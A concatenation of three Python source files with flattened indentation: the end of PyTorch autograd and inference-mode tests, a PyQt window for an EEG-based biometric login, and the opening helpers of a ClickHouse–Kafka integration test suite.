b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
self._test_atleast(device, torch.atleast_1d)
self._test_atleast(device, torch.atleast_2d)
self._test_atleast(device, torch.atleast_3d)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
def _tensor_tensor_helper(x, y):
gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
with torch.no_grad():
x = x.clone()
x[torch.rand_like(x) > 0.5] = 0
gradcheck(lambda y: torch.xlogy(x, y), (y))
gradgradcheck(lambda y: torch.xlogy(x, y), (y))
shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
# For broadcastible shapes and scalar.
for x_shape, y_shape in permutations(shapes, 2):
x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
gradcheck(lambda y: torch.xlogy(0, y), (y))
gradgradcheck(lambda y: torch.xlogy(0, y), (y))
gradcheck(lambda y: torch.xlogy(2, y), (y))
gradgradcheck(lambda y: torch.xlogy(2, y), (y))
gradcheck(lambda y: torch.xlogy(y, 2), (y))
gradgradcheck(lambda y: torch.xlogy(y, 2), (y))
# Different shape
x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
# Same shape
x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
def test_copy_r_to_c(self, device):
out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
requires_grad=True)
def do_test():
out_c.copy_(inp_r)
out_c.sum().backward()
self.assertEqual(inp_r.grad, torch.ones_like(inp_r))
self.assertNotWarn(do_test)
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
@torch.inference_mode()
def func(x):
self.assertTrue(torch.is_inference_mode_enabled())
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(torch.is_inference(d))
self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces a inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# perform view operation produces inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument. So there isn't a mixed inference and normal
# tensor inputs for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since its equivalent as s.view(c.sizes()) which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
threads = []
for _ in range(num_threads):
p = threading.Thread(target=fn, args=(args))
p.start()
threads.append(p)
for p in threads:
p.join()
def test_simple_backward(self):
# simple multithreaded backward that create threads in the beginning of training
# and everything else is training separately, i.e. inputs, operations, etc.
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (i.e. This is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use functional grad() api, gradients will not
# be accumulate to the same place and should be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
# different threads and we need to ensure user specify retain_graph=True, otherwise
# error out with the correct error message
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
# at least one thread will be success in this case, all other threads should raise
# with the error that throw to user to recommend them specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
# result should equal to num_thread * gradients
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
if __name__ == '__main__':
run_tests()
|
login_stimulation_window.py
|
import time
import numpy as np
from threading import Thread
import os
from datetime import datetime
from PyQt5 import QtWidgets, uic
from PyQt5.QtCore import QTimer
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QDesktopWidget
import nas.src.config as config
from nas.src.eeg_recorder import EEGRecorder
from nas.src.data_processing import DataProcessing
from nas.src.stimuli_creator import StimuliCreator
from nas.src.classifier import Classifier
from nas.gui.end_login_window import EndLoginWindow
directory_path = os.path.dirname(os.path.abspath(__file__))
ui_path = os.path.join(directory_path, "designs" + os.sep + "login_stimuli_window.ui")
Ui_RegWindow, QtBaseClass = uic.loadUiType(ui_path)
class LoginStimulationPresentation(QtWidgets.QMainWindow, Ui_RegWindow):
"""
Class for displaying the login stimulation window of the graphical user interface and its manipulation.
The main function of this class is to display individual stimuli to the user and record his EEG signals in his
reactions to them. These reactions are then classified to indicate whether the user is granted access.
:param reg_user: The object of the registered user.
:type reg_user: ``user``
"""
def __init__(self, reg_user):
QtWidgets.QMainWindow.__init__(self)
Ui_RegWindow.__init__(self)
self.setupUi(self)
self.reg_user = reg_user # Object with user, his name, surname and image/stimulus.
self.stimuli_types_array = "" # Array of stimulus types.
self.stimuli_timestamps = np.array([]) # Array of stimuli timestamps.
self.eeg_recorder = None
self.recording_thread = None
self.end_login_window = None
self.stimuli_creator = StimuliCreator(self.reg_user.get_user_stimulus())
# Start timer.
self.starting_time = config.STARTING_TIME
self.FLAG_start_timer = True
self.StartTimer = QTimer(self)
self.StartTimer.timeout.connect(self.update_start_time)
# Stimuli timer.
self.stimuli_time = 0
self.num_of_stimuli = 0
self.FLAG_stimuli_timer = True
self.StimuliTimer = QTimer(self)
self.StimuliTimer.timeout.connect(self.update_stimuli)
# Flags for stimuli type.
self.FLAG_stimulus = False
self.FLAG_blank = True
self.FLAG_change = True # Flag of change, to not call pixmap method multiple times.
self.time_memory = 0 # Memory of time.
self.set_up_window()
def set_up_window(self):
"""
Makes other window settings, such as connecting buttons, etc.
"""
# Center window to screen.
qt_rectangle = self.frameGeometry()
center_point = QDesktopWidget().availableGeometry().center()
qt_rectangle.moveCenter(center_point)
self.move(qt_rectangle.topLeft())
qt_rectangle.moveCenter(center_point)
self.move(qt_rectangle.topLeft())
# Hide unnecessary widgets.
self.StimuliLayoutWidget.hide()
self.StimuliImage.hide()
# Connect ui buttons to methods.
self.StartRecording.clicked.connect(self.start_recording)
def start_recording(self):
"""
Starts recording EEG signals. It is necessary to use a thread for proper functionality.
"""
self.StimuliInfoWidget.hide()
self.StimuliLayoutWidget.show()
self.StartTimer.start(1000)
self.eeg_recorder = EEGRecorder()
self.recording_thread = Thread(target=self.eeg_recorder.start_record)
self.recording_thread.daemon = True # Thread exits if app is closed.
self.recording_thread.start()
def update_start_time(self):
"""
Stimulation start timer.
The default is set to 5 seconds, but this time can be changed in the ``conf.py`` file.
"""
if self.FLAG_start_timer:
self.starting_time -= 1
self.StartTimerLabel.setText(str(self.starting_time))
if self.starting_time == 0:
self.FLAG_start_timer = False
self.StartTimer.stop()
self.StartTimerLabel.hide()
self.stimulation()
def stimulation(self):
"""
Timer of the stimulation itself
"""
self.StimuliTimer.start(10) # 0.1 s / 100 ms
self.StimuliImage.show()
def update_stimuli(self):
"""
Updates the stimulus type.
StimuliCreator is used.
Each stimulus is timed to 0.3 seconds followed by 1 second of the blank screen.
"""
if self.FLAG_stimuli_timer:
self.stimuli_time += 0.01
self.stimuli_time = round(self.stimuli_time, 2)
if self.num_of_stimuli == config.STIMULI_NUM + 1: # Number of stimuli +1 because of time synchronization.
self.FLAG_stimuli_timer = False
self.StimuliTimer.stop()
self.eeg_recorder.stop_record() # Stop recording.
self.get_access_data()
if self.FLAG_stimuli_timer:
if self.FLAG_stimulus:
if self.FLAG_change:
pixmap = self.stimuli_creator.randomized_stimuli()
# Save stimuli timestamps.
stimuli_timestamp = time.time()
self.stimuli_timestamps = np.append(self.stimuli_timestamps, stimuli_timestamp)
self.StimuliImage.setPixmap(QPixmap(pixmap))
self.FLAG_change = False
if self.stimuli_time == round(self.time_memory + 0.3, 2): # TODO add random na 0.3
self.time_memory = self.stimuli_time
self.num_of_stimuli += 1
self.FLAG_stimulus = False
self.FLAG_blank = True
self.FLAG_change = True
if self.FLAG_blank:
if self.FLAG_change:
self.StimuliImage.clear()
self.FLAG_change = False
if self.stimuli_time == round(self.time_memory + 1.0, 2): # TODO add random na 1.0
self.time_memory = self.stimuli_time
self.FLAG_stimulus = True
self.FLAG_blank = False
self.FLAG_change = True
def get_access_data(self):
"""
Classifies access EEG data.
"""
data = self.eeg_recorder.get_rec_data()
timestamps = self.eeg_recorder.get_rec_timestamps()
data_processing = DataProcessing(data, timestamps, self.stimuli_timestamps, config.STIMULI_NUM)
data_processing.filter_data()
# login data & types
login_stimuli_windows = data_processing.create_time_windows()
login_stimuli_types = self.stimuli_creator.get_stimuli_types()
# reg data
reg_stimuli_windows, reg_stimuli_types = self.reg_user.get_reg_data()
#TODO
self.StimuliImage.setText("Prebieha učenie klasifikačného modelu, vydržte prosím.")
# CLASSIFIER
classifier = Classifier(login_stimuli_windows, reg_stimuli_windows, reg_stimuli_types, login_stimuli_types)
# Only deeded if LDA is used.
classifier.prepare_lda_data()
classifier.prepare_cnn_data()
classifier.classify(config.CLASSIFICATION)
access_right = classifier.determine_access_right()
self.end_log_in(access_right)
def end_log_in(self, access_right):
self.end_login_window = EndLoginWindow(self.reg_user, access_right)
self.end_login_window.showMaximized()
self.hide()
|
test.py
|
import json
import os.path as p
import random
import socket
import threading
import time
import logging
import io
import string
import avro.schema
import avro.io
import avro.datafile
from confluent_kafka.avro.cached_schema_registry_client import CachedSchemaRegistryClient
from confluent_kafka.avro.serializer.message_serializer import MessageSerializer
import kafka.errors
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.network import PartitionManager
from helpers.test_tools import TSV
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.protocol.admin import DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
from kafka.admin import NewTopic
# protoc --version
# libprotoc 3.0.0
# # to create kafka_pb2.py
# protoc --python_out=. kafka.proto
from . import kafka_pb2
from . import social_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/kafka.xml'],
with_kafka=True,
with_zookeeper=True, # For Replicated Table
macros={"kafka_broker":"kafka1",
"kafka_topic_old":"old",
"kafka_group_name_old":"old",
"kafka_topic_new":"new",
"kafka_group_name_new":"new",
"kafka_client_id":"instance",
"kafka_format_json_each_row":"JSONEachRow"},
clickhouse_path_dir='clickhouse_path')
def get_kafka_producer(port, serializer, retries):
errors = []
for _ in range(retries):
try:
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(port), value_serializer=serializer)
logging.debug("Kafka Connection establised: localhost:{}".format(port))
return producer
except Exception as e:
errors += [str(e)]
time.sleep(1)
raise Exception("Connection not establised, {}".format(errors))
def producer_serializer(x):
return x.encode() if isinstance(x, str) else x
def kafka_create_topic(admin_client, topic_name, num_partitions=1, replication_factor=1, max_retries=50, config=None):
logging.debug(f"Kafka create topic={topic_name}, num_partitions={num_partitions}, replication_factor={replication_factor}")
topics_list = [NewTopic(name=topic_name, num_partitions=num_partitions, replication_factor=replication_factor, topic_configs=config)]
retries = 0
while True:
try:
admin_client.create_topics(new_topics=topics_list, validate_only=False)
logging.debug("Admin client succeed")
return
except Exception as e:
retries += 1
time.sleep(0.5)
if retries < max_retries:
logging.warning(f"Failed to create topic {e}")
else:
raise
def kafka_delete_topic(admin_client, topic, max_retries=50):
result = admin_client.delete_topics([topic])
for (topic, e) in result.topic_error_codes:
if e == 0:
logging.debug(f"Topic {topic} deleted")
else:
logging.error(f"Failed to delete topic {topic}: {e}")
retries = 0
while True:
topics_listed = admin_client.list_topics()
logging.debug(f"TOPICS LISTED: {topics_listed}")
if topic not in topics_listed:
return
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception(f"Failed to delete topics {topic}, {result}")
def kafka_produce(kafka_cluster, topic, messages, timestamp=None, retries=15):
logging.debug("kafka_produce server:{}:{} topic:{}".format("localhost", kafka_cluster.kafka_port, topic))
producer = get_kafka_producer(kafka_cluster.kafka_port, producer_serializer, retries)
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
## just to ensure the python client / producer is working properly
def kafka_producer_send_heartbeat_msg(max_retries=50):
kafka_produce(kafka_cluster, 'test_heartbeat_topic', ['test'], retries=max_retries)
def kafka_consume(kafka_cluster, topic):
